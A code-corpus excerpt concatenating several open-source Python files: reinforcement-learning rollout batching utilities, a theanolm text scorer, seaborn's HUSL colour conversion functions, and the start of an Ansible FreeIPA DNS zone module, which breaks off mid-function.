"""Utilities related to computing training batches from episode rollouts.
Implementations here are based on code from Open AI:
https://github.com/openai/universe-starter-agent/blob/master/a3c.py.
"""
from collections import namedtuple
import numpy as np
import scipy.signal
from common import utils # brain coder
class Rollout(object):
"""Holds a rollout for an episode.
A rollout is a record of the states observed in some environment and actions
taken by the agent to arrive at those states. Other information includes
rewards received after each action, values estimated for each state, whether
the rollout concluded the episide, and total reward received. Everything
should be given in time order.
At each time t, the agent sees state s_t, takes action a_t, and then receives
reward r_t. The agent may optionally estimate a state value V(s_t) for each
state.
For an episode of length T:
states = [s_0, ..., s_(T-1)]
actions = [a_0, ..., a_(T-1)]
rewards = [r_0, ..., r_(T-1)]
values = [V(s_0), ..., V(s_(T-1))]
Note that there is an extra state s_T observed after taking action a_(T-1),
but this is not included in the rollout.
Rollouts have an `terminated` attribute which is True when the rollout is
"finalized", i.e. it holds a full episode. terminated will be False when
time steps are still being added to it.
"""
def __init__(self):
self.states = []
self.actions = []
self.rewards = []
self.values = []
self.total_reward = 0.0
self.terminated = False
def add(self, state, action, reward, value=0.0, terminated=False):
"""Add the next timestep to this rollout.
Args:
state: The state observed at the start of this timestep.
action: The action taken after observing the given state.
reward: The reward received for taking the given action.
value: The value estimated for the given state.
terminated: Whether this timestep ends the episode.
Raises:
ValueError: If this.terminated is already True, meaning that the episode
has already ended.
"""
if self.terminated:
raise ValueError(
'Trying to add timestep to an already terminal rollout.')
self.states += [state]
self.actions += [action]
self.rewards += [reward]
self.values += [value]
self.terminated = terminated
self.total_reward += reward
def add_many(self, states, actions, rewards, values=None, terminated=False):
"""Add many timesteps to this rollout.
Arguments are the same as `add`, but are lists of equal size.
Args:
states: The states observed.
actions: The actions taken.
rewards: The rewards received.
values: The values estimated for the given states.
terminated: Whether this sequence ends the episode.
Raises:
ValueError: If the lengths of all the input lists are not equal.
ValueError: If this.terminated is already True, meaning that the episode
has already ended.
"""
if len(states) != len(actions):
raise ValueError(
'Number of states and actions must be the same. Got %d states and '
'%d actions' % (len(states), len(actions)))
if len(states) != len(rewards):
raise ValueError(
'Number of states and rewards must be the same. Got %d states and '
'%d rewards' % (len(states), len(rewards)))
if values is not None and len(states) != len(values):
raise ValueError(
'Number of states and values must be the same. Got %d states and '
'%d values' % (len(states), len(values)))
if self.terminated:
raise ValueError(
'Trying to add timesteps to an already terminal rollout.')
self.states += states
self.actions += actions
self.rewards += rewards
self.values += values if values is not None else [0.0] * len(states)
self.terminated = terminated
self.total_reward += sum(rewards)
def extend(self, other):
"""Append another rollout to this rollout."""
assert not self.terminated
self.states.extend(other.states)
self.actions.extend(other.actions)
self.rewards.extend(other.rewards)
self.values.extend(other.values)
self.terminated = other.terminated
self.total_reward += other.total_reward
def discount(x, gamma):
"""Returns discounted sums for each value in x, with discount factor gamma.
This can be used to compute the return (discounted sum of rewards) at each
timestep given a sequence of rewards. See the definitions for return and
REINFORCE in section 3 of https://arxiv.org/pdf/1602.01783.pdf.
Let g^k mean gamma ** k.
For list [x_0, ..., x_N], the following list of discounted sums is computed:
[x_0 + g^1 * x_1 + g^2 * x_2 + ... g^N * x_N,
x_1 + g^1 * x_2 + g^2 * x_3 + ... g^(N-1) * x_N,
x_2 + g^1 * x_3 + g^2 * x_4 + ... g^(N-2) * x_N,
...,
x_(N-1) + g^1 * x_N,
x_N]
Args:
x: List of numbers [x_0, ..., x_N].
gamma: Float between 0 and 1 (inclusive). This is the discount factor.
Returns:
List of discounted sums.
"""
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
def discounted_advantage_and_rewards(rewards, values, gamma, lambda_=1.0):
"""Compute advantages and returns (discounted sum of rewards).
For an episode of length T, rewards = [r_0, ..., r_(T-1)].
Each reward r_t is observed after taking action a_t at state s_t. A final
state s_T is observed but no reward is given at this state since no action
a_T is taken (otherwise there would be a new state s_(T+1)).
`rewards` and `values` are for a single episode. Return R_t is the discounted
sum of future rewards starting at time t, where `gamma` is the discount
factor.
R_t = r_t + gamma * r_(t+1) + gamma**2 * r_(t+2) + ...
+ gamma**(T-1-t) * r_(T-1)
Advantage A(a_t, s_t) is approximated by computing A(a_t, s_t) = R_t - V(s_t)
where V(s_t) is an approximation of the value at that state, given in the
`values` list. Returns R_t are needed for all REINFORCE algorithms. Advantage
is used for the advantage actor critic variant of REINFORCE.
See algorithm S3 in https://arxiv.org/pdf/1602.01783.pdf.
Additionally another parameter `lambda_` controls the bias-variance tradeoff.
See "Generalized Advantage Estimation": https://arxiv.org/abs/1506.02438.
lambda_ = 1 reduces to regular advantage.
0 <= lambda_ < 1 trades off variance for bias, with lambda_ = 0 being the
most biased.
Bootstrapping is also supported. If an episode does not end in a terminal
state (either because the episode was ended early, or the environment does not
have end states), the true return cannot be computed from the rewards alone.
However, it can be estimated by computing the value (an approximation of
return) of the last state s_T. Thus the `values` list will have an extra item:
values = [V(s_0), ..., V(s_(T-1)), V(s_T)].
Args:
rewards: List of observed rewards [r_0, ..., r_(T-1)].
values: List of estimated values [V(s_0), ..., V(s_(T-1))] with an optional
extra V(s_T) item.
gamma: Discount factor. Number between 0 and 1. 1 means no discount.
If not 1, gamma is typically near 1, like 0.99.
lambda_: Bias-variance tradeoff factor. Between 0 and 1.
Returns:
empirical_values: Returns at each timestep.
generalized_advantage: Avantages at each timestep.
Raises:
ValueError: If shapes of `rewards` and `values` are not rank 1.
ValueError: If len(values) not in (len(rewards), len(rewards) + 1).
"""
rewards = np.asarray(rewards, dtype=np.float32)
values = np.asarray(values, dtype=np.float32)
if rewards.ndim != 1:
raise ValueError('Single episode only. rewards must be rank 1.')
if values.ndim != 1:
raise ValueError('Single episode only. values must be rank 1.')
if len(values) == len(rewards):
# No bootstrapping.
values = np.append(values, 0)
empirical_values = discount(rewards, gamma)
elif len(values) == len(rewards) + 1:
# With bootstrapping.
# Last value is for the terminal state (final state after last action was
# taken).
empirical_values = discount(np.append(rewards, values[-1]), gamma)[:-1]
else:
raise ValueError('values should contain the same number of items or one '
'more item than rewards')
delta = rewards + gamma * values[1:] - values[:-1]
generalized_advantage = discount(delta, gamma * lambda_)
# empirical_values is the discounted sum of rewards into the future.
# generalized_advantage is the target for each policy update.
return empirical_values, generalized_advantage
"""Batch holds a minibatch of episodes.
Let bi = batch_index, i.e. the index of each episode in the minibatch.
Let t = time.
Attributes:
states: States for each timestep in each episode. Indexed by states[bi, t].
actions: Actions for each timestep in each episode. Indexed by actions[bi, t].
discounted_adv: Advantages (computed by discounted_advantage_and_rewards)
for each timestep in each episode. Indexed by discounted_adv[bi, t].
discounted_r: Returns (discounted sum of rewards computed by
discounted_advantage_and_rewards) for each timestep in each episode.
Indexed by discounted_r[bi, t].
total_rewards: Total reward for each episode, i.e. sum of rewards across all
timesteps (not discounted). Indexed by total_rewards[bi].
episode_lengths: Number of timesteps in each episode. If an episode has
N actions, N rewards, and N states, then its length is N. Indexed by
episode_lengths[bi].
batch_size: Number of episodes in this minibatch. An integer.
max_time: Maximum episode length in the batch. An integer.
""" # pylint: disable=pointless-string-statement
Batch = namedtuple(
'Batch',
['states', 'actions', 'discounted_adv', 'discounted_r', 'total_rewards',
'episode_lengths', 'batch_size', 'max_time'])
def process_rollouts(rollouts, gamma, lambda_=1.0):
"""Convert a batch of rollouts into tensors ready to be fed into a model.
Lists from each episode are stacked into 2D tensors and padded with 0s up to
the maximum timestep in the batch.
Args:
rollouts: A list of Rollout instances.
gamma: The discount factor. A number between 0 and 1 (inclusive). See gamma
argument in discounted_advantage_and_rewards.
lambda_: See lambda_ argument in discounted_advantage_and_rewards.
Returns:
Batch instance. states, actions, discounted_adv, and discounted_r are
numpy arrays with shape (batch_size, max_episode_length). episode_lengths
is a list of ints. total_rewards is a list of floats (total reward in each
episode). batch_size and max_time are ints.
Raises:
ValueError: If any of the rollouts are not terminal.
"""
for ro in rollouts:
if not ro.terminated:
raise ValueError('Can only process terminal rollouts.')
episode_lengths = [len(ro.states) for ro in rollouts]
batch_size = len(rollouts)
max_time = max(episode_lengths)
states = utils.stack_pad([ro.states for ro in rollouts], 0, max_time)
actions = utils.stack_pad([ro.actions for ro in rollouts], 0, max_time)
discounted_rewards = [None] * batch_size
discounted_adv = [None] * batch_size
for i, ro in enumerate(rollouts):
disc_r, disc_adv = discounted_advantage_and_rewards(
ro.rewards, ro.values, gamma, lambda_)
discounted_rewards[i] = disc_r
discounted_adv[i] = disc_adv
discounted_rewards = utils.stack_pad(discounted_rewards, 0, max_time)
discounted_adv = utils.stack_pad(discounted_adv, 0, max_time)
total_rewards = [sum(ro.rewards) for ro in rollouts]
return Batch(states=states,
actions=actions,
discounted_adv=discounted_adv,
discounted_r=discounted_rewards,
total_rewards=total_rewards,
episode_lengths=episode_lengths,
batch_size=batch_size,
max_time=max_time)
| apache-2.0 | -660,331,608,922,952,800 | 38.513072 | 80 | 0.680341 | false |
senarvi/theanolm | theanolm/scoring/textscorer.py | 1 | 18475 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""A module that implements the TextScorer class.
"""
import logging
import numpy
import theano
import theano.tensor as tensor
from theanolm.backend import NumberError
from theanolm.backend import test_value
from theanolm.parsing import utterance_from_line
class TextScorer(object):
"""Text Scoring Using a Neural Network Language Model
"""
def __init__(self, network, use_shortlist=True, exclude_unk=False,
profile=False):
"""Creates two Theano function, ``self._target_logprobs_function()``,
which computes the log probabilities predicted by the neural network for
the words in a mini-batch, and ``self._total_logprob_function()``, which
returns the total log probability.
Both functions take as arguments four matrices:
1. Word IDs in the shape of a mini-batch. The functions will only use
the input words (not the last time step).
2. Class IDs in the shape of a mini-batch. The functions will slice this
into input and output.
3. Class membership probabilities in the shape of a mini-batch, but only
for the output words (not the first time step).
4. Mask in the shape of a mini-batch, but only for the output words (not
for the first time step).
``self._target_logprobs_function()`` will return a matrix of predicted
log probabilities for the output words (excluding the first time step)
and the mask. ``<unk>`` tokens are also masked out if ``exclude_unk`` is
set to ``True``. ``self._total_logprob_function()`` will return the
total log probability of the predicted (unmasked) words and the number
of those words.
:type network: Network
:param network: the neural network object
:type use_shortlist: bool
:param use_shortlist: if ``True``, the ``<unk>`` probability is
distributed among the out-of-shortlist words
:type exclude_unk: bool
:param exclude_unk: if set to ``True``, ``<unk>`` tokens are excluded
from probability computation
:type profile: bool
:param profile: if set to True, creates a Theano profile object
"""
self._vocabulary = network.vocabulary
self._unk_id = self._vocabulary.word_to_id['<unk>']
# The functions take as input a mini-batch of word IDs and class IDs,
# and slice input and target IDs for the network.
batch_word_ids = tensor.matrix('textscorer/batch_word_ids',
dtype='int64')
batch_word_ids.tag.test_value = test_value(
size=(21, 4), high=self._vocabulary.num_words())
batch_class_ids = tensor.matrix('textscorer/batch_class_ids',
dtype='int64')
batch_class_ids.tag.test_value = test_value(
size=(21, 4), high=self._vocabulary.num_classes())
membership_probs = tensor.matrix('textscorer/membership_probs',
dtype=theano.config.floatX)
membership_probs.tag.test_value = test_value(
size=(20, 4), high=1.0)
# Convert out-of-shortlist words to <unk> in input.
shortlist_size = self._vocabulary.num_shortlist_words()
input_word_ids = batch_word_ids[:-1]
oos_indices = tensor.ge(input_word_ids, shortlist_size).nonzero()
input_word_ids = tensor.set_subtensor(input_word_ids[oos_indices],
self._unk_id)
# Out-of-shortlist words are already in <unk> class, because they don't
# have own classes.
input_class_ids = batch_class_ids[:-1]
target_class_ids = batch_class_ids[1:]
# Target word IDs are not used by the network. We need them to compute
# probabilities for out-of-shortlist word.
target_word_ids = batch_word_ids[1:]
logprobs = tensor.log(network.target_probs())
# Add logprobs from the class membership of the predicted word.
logprobs += tensor.log(membership_probs)
mask = network.mask
if use_shortlist and network.oos_logprobs is not None:
# The probability of out-of-shortlist words (which is the <unk>
# probability) is multiplied by the fraction of the actual word
# within the set of OOS words.
logprobs += network.oos_logprobs[target_word_ids]
# Always exclude OOV words when using a shortlist - No probability
# mass is left for them.
mask *= tensor.neq(target_word_ids, self._unk_id)
elif exclude_unk:
# If requested, ignore OOS and OOV probabilities.
mask *= tensor.neq(target_word_ids, self._unk_id)
mask *= tensor.lt(target_word_ids, shortlist_size)
# Ignore unused input variables, because is_training is only used by
# dropout layer.
masked_logprobs = logprobs * tensor.cast(mask, theano.config.floatX)
self._target_logprobs_function = theano.function(
[batch_word_ids, batch_class_ids, membership_probs, network.mask],
[masked_logprobs, mask],
givens=[(network.input_word_ids, input_word_ids),
(network.input_class_ids, input_class_ids),
(network.target_class_ids, target_class_ids),
(network.is_training, numpy.int8(0))],
name='target_logprobs',
on_unused_input='ignore',
profile=profile)
# If some word is not in the training data, its class membership
# probability will be zero. We want to ignore those words. Multiplying
# by the mask is not possible, because those logprobs will be -inf.
mask *= tensor.neq(membership_probs, 0.0)
masked_logprobs = tensor.switch(mask, logprobs, 0.0)
self._total_logprob_function = theano.function(
[batch_word_ids, batch_class_ids, membership_probs, network.mask],
[masked_logprobs.sum(), mask.sum()],
givens=[(network.input_word_ids, input_word_ids),
(network.input_class_ids, input_class_ids),
(network.target_class_ids, target_class_ids),
(network.is_training, numpy.int8(0))],
name='total_logprob',
on_unused_input='ignore',
profile=profile)
# These are updated by score_line().
self.num_words = 0
self.num_unks = 0
def score_batch(self, word_ids, class_ids, membership_probs, mask):
"""Computes the log probabilities predicted by the neural network for
the words in a mini-batch.
The result will be returned in a list of lists. The indices will be a
transpose of those of the input matrices, so that the first index is the
sequence, not the time step. The lists will contain ``None`` values in
place of any ``<unk>`` tokens, if the constructor was given
``exclude_unk=True``. When using a shortlist, the lists will always
contain ``None`` in place of OOV words, and if ``exclude_unk=True`` was
given, also in place of OOS words. Words with zero class membership
probability will have ``-inf`` log probability.
:type word_ids: numpy.ndarray of an integer type
:param word_ids: a 2-dimensional matrix, indexed by time step and
sequence, that contains the word IDs
:type class_ids: numpy.ndarray of an integer type
:param class_ids: a 2-dimensional matrix, indexed by time step and
sequence, that contains the class IDs
:type membership_probs: numpy.ndarray of a floating point type
:param membership_probs: a 2-dimensional matrix, indexed by time step
and sequences, that contains the class
membership probabilities of the words
:type mask: numpy.ndarray of a floating point type
:param mask: a 2-dimensional matrix, indexed by time step and sequence,
that masks out elements past the sequence ends
:rtype: list of lists
:returns: logprob of each word in each sequence, ``None`` values
indicating excluded <unk> tokens
"""
result = []
membership_probs = membership_probs.astype(theano.config.floatX)
# target_logprobs_function() uses the word and class IDs of the entire
# mini-batch, but membership probs and mask are only for the output.
logprobs, new_mask = self._target_logprobs_function(word_ids,
class_ids,
membership_probs[1:],
mask[1:])
for seq_index in range(logprobs.shape[1]):
seq_mask = mask[1:, seq_index]
seq_logprobs = logprobs[seq_mask == 1, seq_index]
# The new mask also masks excluded tokens, replace those with None.
seq_mask = new_mask[seq_mask == 1, seq_index]
seq_logprobs = [lp if m == 1 else None
for lp, m in zip(seq_logprobs, seq_mask)]
result.append(seq_logprobs)
return result
def compute_perplexity(self, batch_iter):
"""Computes the perplexity of text read using the given iterator.
``batch_iter`` is an iterator to the input data. On each call it creates
a two 2-dimensional matrices, both indexed by time step and sequence.
The first matrix contains the word IDs, the second one masks out
elements past the sequence ends.
``<unk>`` tokens will be excluded from the perplexity computation, if
the constructor was given ``exclude_unk=True``. When using a shortlist,
OOV words are always excluded, and if ``exclude_unk=True`` was given,
OOS words are also excluded. Words with zero class membership
probability are always excluded.
:type batch_iter: BatchIterator
:param batch_iter: an iterator that creates mini-batches from the input
data
:rtype: float
:returns: perplexity, i.e. exponent of negative log probability
normalized by the number of words
"""
logprob = 0
num_words = 0
for word_ids, _, mask in batch_iter:
class_ids, membership_probs = \
self._vocabulary.get_class_memberships(word_ids)
membership_probs = membership_probs.astype(theano.config.floatX)
# total_logprob_function() uses the word and class IDs of the entire
# mini-batch, but membership probs and mask are only for the output.
batch_logprob, batch_num_words = \
self._total_logprob_function(word_ids,
class_ids,
membership_probs[1:],
mask[1:])
if numpy.isnan(batch_logprob):
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Log probability of a mini-batch is NaN.")
if numpy.isneginf(batch_logprob):
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Probability of a mini-batch is zero.")
if batch_logprob > 0.0:
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Probability of a mini-batch is greater than one.")
logprob += batch_logprob
num_words += batch_num_words
if num_words == 0:
raise ValueError("Zero words for computing perplexity. Does the "
"evaluation data contain only OOV words?")
cross_entropy = -logprob / num_words
return numpy.exp(cross_entropy)
def score_sequence(self, word_ids, class_ids, membership_probs):
"""Computes the log probability of a word sequence.
``<unk>`` tokens will be excluded from the probability computation, if
the constructor was given ``exclude_unk=True``. When using a shortlist,
OOV words are always excluded, and if ``exclude_unk=True`` was given,
OOS words are also excluded. Words with zero class membership
probability are always excluded.
:type word_ids: ndarray
:param word_ids: a vector of word IDs
:type class_ids: list of ints
:param class_ids: corresponding class IDs
:type membership_probs: list of floats
:param membership_probs: list of class membership probabilities
:rtype: float
:returns: log probability of the word sequence
"""
# Create 2-dimensional matrices representing the transposes of the
# vectors.
word_ids = numpy.transpose(word_ids[numpy.newaxis])
class_ids = numpy.array([[x] for x in class_ids], numpy.int64)
membership_probs = numpy.array(
[[x] for x in membership_probs]).astype(theano.config.floatX)
# Mask used by the network is all ones.
mask = numpy.ones(word_ids.shape, numpy.int8)
# total_logprob_function() uses the word and class IDs of the entire
# mini-batch, but membership probs and mask are only for the output.
logprob, _ = self._total_logprob_function(word_ids,
class_ids,
membership_probs[1:],
mask[1:])
if numpy.isnan(logprob):
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Log probability of a sequence is NaN.")
if numpy.isneginf(logprob):
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Probability of a sequence is zero.")
if logprob > 0.0:
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Probability of a sequence is greater than one.")
return logprob
def score_line(self, line, vocabulary):
"""Scores a line of text.
Start-of-sentence and end-of-sentece tags (``<s>`` and ``</s>``) will be
inserted at the beginning and the end of the line, if they're missing.
If the line is empty, ``None`` will be returned, instead of interpreting
it as the empty sentence ``<s> </s>``.
``<unk>`` tokens will be excluded from the probability computation, if
the constructor was given ``exclude_unk=True``. When using a shortlist,
OOV words are always excluded, and if ``exclude_unk=True`` was given,
OOS words are also excluded. Words with zero class membership
probability are always excluded.
:type line: str
:param line: a sequence of words
:type vocabulary: Vocabulary
:param vocabulary: vocabulary for converting the words to word IDs
:rtype: float
:returns: log probability of the word sequence, or None if the line is
empty
"""
words = utterance_from_line(line)
if not words:
return None
word_ids = vocabulary.words_to_ids(words)
unk_id = vocabulary.word_to_id['<unk>']
self.num_words += word_ids.size
self.num_unks += numpy.count_nonzero(word_ids == unk_id)
class_ids = [vocabulary.word_id_to_class_id[word_id]
for word_id in word_ids]
probs = [vocabulary.get_word_prob(word_id)
for word_id in word_ids]
return self.score_sequence(word_ids, class_ids, probs)
def _debug_log_batch(self, word_ids, class_ids, membership_probs, mask):
"""Writes the target word IDs, their log probabilities, and the mask to
the debug log.
:type word_ids: numpy.ndarray of an integer type
:param word_ids: a 2-dimensional matrix, indexed by time step and
sequence, that contains the word IDs
:type class_ids: numpy.ndarray of an integer type
:param class_ids: a 2-dimensional matrix, indexed by time step and
sequence, that contains the class IDs
:type membership_probs: numpy.ndarray of a floating point type
:param membership_probs: a 2-dimensional matrix, indexed by time step
and sequences, that contains the class
membership probabilities of the words
:type mask: numpy.ndarray of a floating point type
:param mask: a 2-dimensional matrix, indexed by time step and sequence,
that masks out elements past the sequence ends
"""
membership_probs = membership_probs.astype(theano.config.floatX)
# target_logprobs_function() uses the word and class IDs of the entire
# mini-batch, but membership probs and mask are only for the output.
logprobs, new_mask = self._target_logprobs_function(word_ids,
class_ids,
membership_probs[1:],
mask[1:])
for seq_index in range(logprobs.shape[1]):
target_word_ids = word_ids[1:, seq_index]
seq_mask = mask[1:, seq_index]
seq_word_ids = target_word_ids[seq_mask == 1]
seq_logprobs = logprobs[seq_mask == 1, seq_index]
# The new mask also masks excluded tokens.
seq_mask = new_mask[seq_mask == 1, seq_index]
logging.debug("Sequence %i target word IDs: [%s]",
seq_index, ", ".join(str(x) for x in seq_word_ids))
logging.debug("Sequence %i mask: [%s]",
seq_index, ", ".join(str(x) for x in seq_mask))
logging.debug("Sequence %i logprobs: [%s]",
seq_index, ", ".join(str(x) for x in seq_logprobs))
| apache-2.0 | -205,964,645,865,236,260 | 46.615979 | 85 | 0.593126 | false |
dhimmel/seaborn | seaborn/external/husl.py | 35 | 6661 | import operator
import math
__version__ = "2.1.0"
m = [
[3.2406, -1.5372, -0.4986],
[-0.9689, 1.8758, 0.0415],
[0.0557, -0.2040, 1.0570]
]
m_inv = [
[0.4124, 0.3576, 0.1805],
[0.2126, 0.7152, 0.0722],
[0.0193, 0.1192, 0.9505]
]
# Hard-coded D65 illuminant
refX = 0.95047
refY = 1.00000
refZ = 1.08883
refU = 0.19784
refV = 0.46834
lab_e = 0.008856
lab_k = 903.3
# Public API
def husl_to_rgb(h, s, l):
return lch_to_rgb(*husl_to_lch([h, s, l]))
def husl_to_hex(h, s, l):
return rgb_to_hex(husl_to_rgb(h, s, l))
def rgb_to_husl(r, g, b):
return lch_to_husl(rgb_to_lch(r, g, b))
def hex_to_husl(hex):
return rgb_to_husl(*hex_to_rgb(hex))
def huslp_to_rgb(h, s, l):
return lch_to_rgb(*huslp_to_lch([h, s, l]))
def huslp_to_hex(h, s, l):
return rgb_to_hex(huslp_to_rgb(h, s, l))
def rgb_to_huslp(r, g, b):
return lch_to_huslp(rgb_to_lch(r, g, b))
def hex_to_huslp(hex):
return rgb_to_huslp(*hex_to_rgb(hex))
def lch_to_rgb(l, c, h):
return xyz_to_rgb(luv_to_xyz(lch_to_luv([l, c, h])))
def rgb_to_lch(r, g, b):
return luv_to_lch(xyz_to_luv(rgb_to_xyz([r, g, b])))
def max_chroma(L, H):
hrad = math.radians(H)
sinH = (math.sin(hrad))
cosH = (math.cos(hrad))
sub1 = (math.pow(L + 16, 3.0) / 1560896.0)
sub2 = sub1 if sub1 > 0.008856 else (L / 903.3)
result = float("inf")
for row in m:
m1 = row[0]
m2 = row[1]
m3 = row[2]
top = ((0.99915 * m1 + 1.05122 * m2 + 1.14460 * m3) * sub2)
rbottom = (0.86330 * m3 - 0.17266 * m2)
lbottom = (0.12949 * m3 - 0.38848 * m1)
bottom = (rbottom * sinH + lbottom * cosH) * sub2
for t in (0.0, 1.0):
C = (L * (top - 1.05122 * t) / (bottom + 0.17266 * sinH * t))
if C > 0.0 and C < result:
result = C
return result
def _hrad_extremum(L):
lhs = (math.pow(L, 3.0) + 48.0 * math.pow(L, 2.0) + 768.0 * L + 4096.0) / 1560896.0
rhs = 1107.0 / 125000.0
sub = lhs if lhs > rhs else 10.0 * L / 9033.0
chroma = float("inf")
result = None
for row in m:
for limit in (0.0, 1.0):
[m1, m2, m3] = row
top = -3015466475.0 * m3 * sub + 603093295.0 * m2 * sub - 603093295.0 * limit
bottom = 1356959916.0 * m1 * sub - 452319972.0 * m3 * sub
hrad = math.atan2(top, bottom)
# This is a math hack to deal with tan quadrants, I'm too lazy to figure
# out how to do this properly
if limit == 0.0:
hrad += math.pi
test = max_chroma(L, math.degrees(hrad))
if test < chroma:
chroma = test
result = hrad
return result
def max_chroma_pastel(L):
H = math.degrees(_hrad_extremum(L))
return max_chroma(L, H)
def dot_product(a, b):
return sum(map(operator.mul, a, b))
def f(t):
if t > lab_e:
return (math.pow(t, 1.0 / 3.0))
else:
return (7.787 * t + 16.0 / 116.0)
def f_inv(t):
if math.pow(t, 3.0) > lab_e:
return (math.pow(t, 3.0))
else:
return (116.0 * t - 16.0) / lab_k
def from_linear(c):
if c <= 0.0031308:
return 12.92 * c
else:
return (1.055 * math.pow(c, 1.0 / 2.4) - 0.055)
def to_linear(c):
a = 0.055
if c > 0.04045:
return (math.pow((c + a) / (1.0 + a), 2.4))
else:
return (c / 12.92)
def rgb_prepare(triple):
ret = []
for ch in triple:
ch = round(ch, 3)
if ch < -0.0001 or ch > 1.0001:
raise Exception("Illegal RGB value %f" % ch)
if ch < 0:
ch = 0
if ch > 1:
ch = 1
# Fix for Python 3 which by default rounds 4.5 down to 4.0
# instead of Python 2 which is rounded to 5.0 which caused
# a couple off by one errors in the tests. Tests now all pass
# in Python 2 and Python 3
ret.append(round(ch * 255 + 0.001, 0))
return ret
def hex_to_rgb(hex):
if hex.startswith('#'):
hex = hex[1:]
r = int(hex[0:2], 16) / 255.0
g = int(hex[2:4], 16) / 255.0
b = int(hex[4:6], 16) / 255.0
return [r, g, b]
def rgb_to_hex(triple):
[r, g, b] = triple
return '#%02x%02x%02x' % tuple(rgb_prepare([r, g, b]))
def xyz_to_rgb(triple):
xyz = map(lambda row: dot_product(row, triple), m)
return list(map(from_linear, xyz))
def rgb_to_xyz(triple):
rgbl = list(map(to_linear, triple))
return list(map(lambda row: dot_product(row, rgbl), m_inv))
def xyz_to_luv(triple):
X, Y, Z = triple
if X == Y == Z == 0.0:
return [0.0, 0.0, 0.0]
varU = (4.0 * X) / (X + (15.0 * Y) + (3.0 * Z))
varV = (9.0 * Y) / (X + (15.0 * Y) + (3.0 * Z))
L = 116.0 * f(Y / refY) - 16.0
# Black will create a divide-by-zero error
if L == 0.0:
return [0.0, 0.0, 0.0]
U = 13.0 * L * (varU - refU)
V = 13.0 * L * (varV - refV)
return [L, U, V]
def luv_to_xyz(triple):
L, U, V = triple
if L == 0:
return [0.0, 0.0, 0.0]
varY = f_inv((L + 16.0) / 116.0)
varU = U / (13.0 * L) + refU
varV = V / (13.0 * L) + refV
Y = varY * refY
X = 0.0 - (9.0 * Y * varU) / ((varU - 4.0) * varV - varU * varV)
Z = (9.0 * Y - (15.0 * varV * Y) - (varV * X)) / (3.0 * varV)
return [X, Y, Z]
def luv_to_lch(triple):
L, U, V = triple
C = (math.pow(math.pow(U, 2) + math.pow(V, 2), (1.0 / 2.0)))
hrad = (math.atan2(V, U))
H = math.degrees(hrad)
if H < 0.0:
H = 360.0 + H
return [L, C, H]
def lch_to_luv(triple):
L, C, H = triple
Hrad = math.radians(H)
U = (math.cos(Hrad) * C)
V = (math.sin(Hrad) * C)
return [L, U, V]
def husl_to_lch(triple):
H, S, L = triple
if L > 99.9999999:
return [100, 0.0, H]
if L < 0.00000001:
return [0.0, 0.0, H]
mx = max_chroma(L, H)
C = mx / 100.0 * S
return [L, C, H]
def lch_to_husl(triple):
L, C, H = triple
if L > 99.9999999:
return [H, 0.0, 100.0]
if L < 0.00000001:
return [H, 0.0, 0.0]
mx = max_chroma(L, H)
S = C / mx * 100.0
return [H, S, L]
def huslp_to_lch(triple):
H, S, L = triple
if L > 99.9999999:
return [100, 0.0, H]
if L < 0.00000001:
return [0.0, 0.0, H]
mx = max_chroma_pastel(L)
C = mx / 100.0 * S
return [L, C, H]
def lch_to_huslp(triple):
L, C, H = triple
if L > 99.9999999:
return [H, 0.0, 100.0]
if L < 0.00000001:
return [H, 0.0, 0.0]
mx = max_chroma_pastel(L)
S = C / mx * 100.0
return [H, S, L]
| bsd-3-clause | -4,404,592,821,798,283,000 | 20.28115 | 89 | 0.498724 | false |
garbled1/ansible | lib/ansible/modules/identity/ipa/ipa_dnszone.py | 16 | 4987 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Fran Fitzpatrick ([email protected])
# Borrowed heavily from other work by Abhijeet Kasurde ([email protected])
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ipa_dnszone
author: Fran Fitzpatrick (@fxfitz)
short_description: Manage FreeIPA DNS Zones
description:
- Add and delete an IPA DNS Zones using IPA API
options:
zone_name:
description:
- The DNS zone name to which needs to be managed.
required: true
state:
description: State to ensure
required: false
default: present
choices: ["present", "absent"]
ipa_port:
description: Port of IPA server
required: false
default: 443
ipa_host:
description: IP or hostname of IPA server
required: false
default: localhost
ipa_user:
description: Administrative account used on IPA server
required: false
default: admin
ipa_pass:
description: Password of administrative user
required: true
ipa_prot:
description: Protocol used by IPA server
required: false
default: https
choices: ["http", "https"]
validate_certs:
description:
- This only applies if C(ipa_prot) is I(https).
- If set to C(no), the SSL certificates will not be validated.
- This should only set to C(no) used on personally controlled sites using self-signed certificates.
required: false
default: true
version_added: "2.5"
'''
EXAMPLES = '''
# Ensure dns zone is present
- ipa_dnsrecord:
ipa_host: spider.example.com
ipa_pass: Passw0rd!
state: present
zone_name: example.com
# Ensure that dns zone is removed
- ipa_dnszone:
zone_name: example.com
ipa_host: localhost
ipa_user: admin
ipa_pass: topsecret
state: absent
'''
RETURN = '''
zone:
description: DNS zone as returned by IPA API.
returned: always
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ipa import IPAClient
from ansible.module_utils._text import to_native
class DNSZoneIPAClient(IPAClient):
def __init__(self, module, host, port, protocol):
super(DNSZoneIPAClient, self).__init__(module, host, port, protocol)
def dnszone_find(self, zone_name):
return self._post_json(
method='dnszone_find',
name=zone_name,
item={'idnsname': zone_name}
)
def dnszone_add(self, zone_name=None, details=None):
return self._post_json(
method='dnszone_add',
name=zone_name,
item={}
)
def dnszone_del(self, zone_name=None, record_name=None, details=None):
return self._post_json(
method='dnszone_del', name=zone_name, item={})
def ensure(module, client):
zone_name = module.params['zone_name']
state = module.params['state']
ipa_dnszone = client.dnszone_find(zone_name)
changed = False
if state == 'present':
if not ipa_dnszone:
changed = True
if not module.check_mode:
client.dnszone_add(zone_name=zone_name)
else:
changed = False
